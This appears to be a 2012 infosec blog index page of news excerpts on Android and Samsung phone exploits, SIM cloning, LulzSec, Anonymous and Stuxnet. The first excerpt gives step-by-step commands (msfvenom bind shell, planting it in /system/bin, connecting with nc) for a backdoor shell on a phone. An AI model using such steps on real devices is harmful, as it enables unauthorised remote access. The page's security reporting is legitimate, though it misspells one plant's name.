Pages Menu
TwitterRssFacebook
Categories Menu

Posted by on Oct 5, 2012 in Infosec, Malware | 0 comments

A simple android shell with Metasploit

A simple android shell with Metasploit

_anUBiS a respected member of the corrupt a computer security forum has posted method to open a android shell with metasploit framework. The steps given by him are as follows, 1) Create ARM executable msfvenom -p linux/armle/shell_bind_tcp -f elf LPORT=6666 > /tmp/backdoor 2) Mount your android /system/bin dir for r/wI used “Root Explorer” app for this. There are other ways to do it. 3) Copy /tmp/backdoor (from Backtrack) to /system/bin/backdoor (your phone) and chmod 777 4) Run ‘backdoor’ on your phone. (Use a terminal emulator, or find any other way  ) 5) Connect to phone nc your.phone.ip.address 6666 6) When connection is established, set PATH variable PATH=/system/bin He further says it still needs root permission plant this, and shell does not listen persistently, so when we disconnect,  the file must be run again on the phone. Source :...

Read More

Posted by on Sep 25, 2012 in Hacking, Infosec | 0 comments

Samsung Touch Wiz exploit could reset your smartphone with a click

Samsung Touch Wiz exploit could reset your smartphone with a click

A Samsung Galaxy SII with Touch Wiz If you are a Samsung smartphone owner, you are in for a big trouble if  Samsung does not release a fix soon for a recent exploit by which any one can factory reset your mobile with a simple click ! Ravi Shankar a Security researcher in Telecommunications department at Technical University Berlin demoed the USSD code vulnerability in the Samsung Touch Wiz Android skin found in it’s flagship smartphones such as Galaxy S1, SII and the more recent SIII at the ektoparty security conference in Buenos Aires. He said that, the USSD code to reset Samsung smartphones can be invoked via HTML, QR and NFC and the phone can be factory reset with user intervention. He further added that the url for the malicious site with HTML code could be sent as an sms and still wipe the phone when the link is clicked. This exploit is confirmed to work on all Galaxy SII models and AT&T version of Galaxy SIII, Ravi mentions in the...

Read More

Posted by on Jul 2, 2012 in Hacking, Infosec | 0 comments

Why stealing data from mobile phone is not possible through SIM cloning and media should research further

Why stealing data from mobile phone is not possible through SIM cloning and media should research further

The news which is making waves in the tech circle in India today was the one from Times of India regarding the SIM card cloning warning from BSNL which says , if you get a missed call from  +92; #90 or #09 you shouldn’t call them back because your SIM(Subscriber Identity Module)  would be cloned. That’s not it. Here comes the hilarious second part, TOI claims that an intelligence official who spoke to them mentioned that the person who cloned the SIM could steal the data from your mobile and also from the the external memory card. By the usual plagiarism followed in the news industry today, various leading tech sites published the article including thinkDigit  without researching the technical feasibility of the article. (Note : By the time of writing this article, TOI has edited the article saying it has reservations on the claims made by the officials. ) Now lets come to the basics of SIM cloning, 1. A phreaker (a person who hacks the tele-communication systems ) snoops around the target cellphone with...

Read More

Posted by on Jun 12, 2012 in Hacking, Infosec | 0 comments

8000 Twitter accounts data posted by LulzSec, passwords not hacked

8000 Twitter accounts data posted by LulzSec, passwords not hacked

The infamous hacking group LulzSec known for their motive-less hacking of high profile targets have released data from 8000 twitter accounts who used image sharing service TweetGif. Unlike earlier hacks , this does not include passwords/hashes. The file mostly contained public information like names and locations displayed next to the twitter handles. But the list contained token/secret pairs, which are used to authorize third party services like TweetGif to post to an account. However, these codes expire over time. The access to these services can be revoked using the twitter settings. A twitter spokesman has said, “I can confirm that no Twitter account passwords were leaked,” “Twitter was not compromised in this instance.” This shows the importance of security policies to be followed by third party services which collaborate with social network sites. source :...

Read More

Posted by on Jun 9, 2012 in Hacking, Infosec | 1 comment

Anonymous supported Anti web-censorship protests across India

Anonymous supported Anti web-censorship protests across India

Anti web-censorship protest in Delhi In a very first to India, people were seen in major cities wearing ‘Guy Fawkes’ masks showing the support of infamous hacktivist group called ‘Anonymous‘ in their protest against recent series of web-censorship in India. Anonymous had  called for the support of Anti web-censorship protests across India today.  Earlier today it launched DDOS attacks (Distributed Denial of Service) attack on Indian government sites of Computer Emergency Response Team (CERT – www.cert.org.in) and www.india.gov.in, these sites were down till afternoon. On june 6, the website of state-run telecom company MTNL was disrupted by ‘Anonymous’ to protest against “censorship” of the internet. The protesters were seen holding banners and raised slogans like, “Raise your voice, save your voice.” The protests called #opindia on social networking sites such as Twitter and Facebook came to light on March 29 when a court order was passed in Chennai asking 15 Indian ISP’s (Internet Service Provider) to block the access to file-sharing websites such as The Pirate Bay. Also the recent...

Read More

Posted by on Jun 9, 2012 in Infosec, Malware | 0 comments

Operation: Olympic Games, the secrets behind the worlds first sophisticated cyber attack malware – Stuxnet

Operation: Olympic Games, the secrets behind the worlds first sophisticated cyber attack malware – Stuxnet

Iran’s president ahmadinejad looking at the centrifuges World’s first sophisticated cyber attack malware – Stuxnet was the weapon of the operation – Olympic Games says The NewYork Times in an article published earlier this week. The detailed article says, A cyberwar against Iran’s nuclear enrichment program was launched during Bush administration and it was it was accelerated by Obama administration. The operation was called ‘Olympic Games’. Stuxnet was the weapon of the Olympic Games, jointly developed by NSA (National Security Agency) of America and Israel’s Unit 8200 (part of Israel’s military technical intelligence unit). Israel had cooperated with United States in this operation disabling Iran’s nuclear enrichment program by sabotaging thousands of Centrifuges in the Nantz underground Nuclear plant in Iran. The Stuxnet malware were intended to infect only the computers connected with the centrifuges but went wild due to the error in the program in one of the updates which followed the initial version. It seems initially the malware were introduced to the computers in the Nantz plant by...

Read More
Page 1 of 512345